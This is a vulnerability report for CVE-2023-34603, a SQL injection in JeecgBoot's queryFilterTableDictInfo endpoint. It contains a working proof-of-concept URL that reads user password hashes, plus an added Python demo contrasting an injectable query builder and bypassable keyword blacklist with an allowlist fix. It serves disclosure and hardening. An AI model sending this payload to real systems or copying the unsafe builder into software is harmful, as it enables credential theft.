CVE-2023-34603: SQL injection via the org.jeecg.modules.api.controller.SystemApiController.queryFilterTableDictInfo method · Issue #4984 · jeecgboot/jeecg-boot
JeecgBoot up to v3.5.1 was discovered to contain a SQL injection vulnerability via the component queryFilterTableDictInfo in org.jeecg.modules.api.controller.SystemApiController.
Version:
3.5.1 and all earlier versions
Frontend version: vue3 or vue2?
vue3
Problem description:
Similar to issue #4983, calling the queryFilterTableDictInfo method of the org.jeecg.modules.api.controller.SystemApiController class triggers SQL injection, allowing key information to be read from the database as desired. The root cause is that once the SQL injection detection method is bypassed, the ${XXX} placeholders in MyBatis carry a SQL injection risk.
Screenshots & code:
source code: (screenshot, captioned "SQL Injection")
URL: http://localhost:8080/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=password as "text", username as “value” from sys_user --&code=username&filterSql=
Friendly reminder (to improve issue handling efficiency):
- Posts that do not follow the required format will be deleted outright;
- Descriptions too brief or vague to be acted on will be deleted outright;
- Please judge for yourself whether the problem description is clear and convenient for us to investigate;
- For the problem, state whether it concerns the Online feature (specify the theme template used) or generated code.
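The following is an added example, not JeecgBoot code, showing why the PoC URL above works and what a hardened version of the same lookup looks like. It assumes a mapper of the shape `select ${text} as "text", ${code} as "value" from ${table} [where ${filterSql}]` (the shape is an assumption, not quoted from the project), a constructed `sys_user` table, a constructed keyword blacklist standing in for the "SQL injection detection method" the report mentions, and the PoC parameters with straight quotes substituted for the curly ones in the issue text so the SQL parses. It runs against an in-memory SQLite database.

```python
"""Added illustration of the MyBatis ${} interpolation issue behind CVE-2023-34603.

Not JeecgBoot code. The mapper shape, the blacklist, the allowlist and the
sample table are assumptions/constructions made for this demonstration.
"""
import re
import sqlite3

# Constructed stand-in for the sys_user table the PoC targets.
SAMPLE_SCHEMA = """
CREATE TABLE sys_user (
    id INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    password TEXT NOT NULL,
    realname TEXT
);
INSERT INTO sys_user VALUES (1, 'admin', 'hash-admin', 'Administrator');
INSERT INTO sys_user VALUES (2, 'jeecg', 'hash-jeecg', 'Jeecg Demo');
"""

# Parameters from the PoC URL in the issue (straight quotes substituted).
POC_TABLE = "sys_user"
POC_TEXT = 'password as "text", username as "value" from sys_user --'
POC_CODE = "username"

# Constructed keyword blacklist in the style of a "SQL injection detection
# method"; illustrative only, not the project's actual filter.
BLACKLIST = ("select ", "union ", "insert ", "update ", "delete ", "drop ", ";")


def keyword_filter_passes(value):
    """Blacklist check: True when no banned token appears in the input."""
    lowered = value.lower()
    return not any(token in lowered for token in BLACKLIST)


def build_dict_sql_unsafe(table, text, code, filter_sql=""):
    """Mimic a mapper that uses ${} for every parameter (assumed shape).
    ${} is plain string substitution, so caller text lands in the SQL verbatim."""
    sql = f'select {text} as "text", {code} as "value" from {table}'
    if filter_sql:
        sql += f" where {filter_sql}"
    return sql


# Hardened form: identifiers cannot be bound as ? parameters, so they are
# validated as bare identifiers and checked against a per-table allowlist
# of columns a dictionary lookup may expose (constructed for the example).
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
ALLOWED_COLUMNS = {"sys_user": {"username", "realname"}}


def build_dict_sql_safe(table, text, code, filter_sql=""):
    """Reject anything that is not a plain, allowlisted identifier; refuse a
    free-form filter fragment, which cannot be made safe by escaping."""
    for name, value in (("table", table), ("text", text), ("code", code)):
        if not IDENTIFIER.match(value):
            raise ValueError(f"{name} is not a plain identifier: {value!r}")
    allowed = ALLOWED_COLUMNS.get(table)
    if allowed is None or text not in allowed or code not in allowed:
        raise ValueError(f"{table}.{text}/{code} not allowed for dict lookup")
    if filter_sql:
        raise ValueError("raw filterSql fragments are not accepted")
    return f'select "{text}" as "text", "{code}" as "value" from "{table}"'


def run(sql):
    """Execute sql against a fresh in-memory copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    rows = conn.execute(sql).fetchall()
    conn.close()
    return rows


def demo_poc():
    """Feed the PoC parameters to both builders.
    Returns (rows leaked by the unsafe builder, error raised by the safe one)."""
    # The blacklist sees nothing it recognises: the payload only uses column
    # aliases, 'from' and a '--' comment that swallows the rest of the query.
    assert keyword_filter_passes(POC_TEXT)
    leaked = run(build_dict_sql_unsafe(POC_TABLE, POC_TEXT, POC_CODE))
    try:
        build_dict_sql_safe(POC_TABLE, POC_TEXT, POC_CODE)
        blocked = None
    except ValueError as exc:
        blocked = str(exc)
    return leaked, blocked


if __name__ == "__main__":
    leaked_rows, error = demo_poc()
    for text, value in leaked_rows:
        print(f"leaked: {value} -> {text}")
    print("hardened builder:", error)
```

The unsafe builder expands the PoC into `select password as "text", username as "value" from sys_user -- as "text", ...`, so the trailing part of the template is commented out and every user's password hash comes back as the dictionary "text". The fix is not a better blacklist: identifiers must be validated and allowlisted, and `filterSql` as an arbitrary fragment has no safe form.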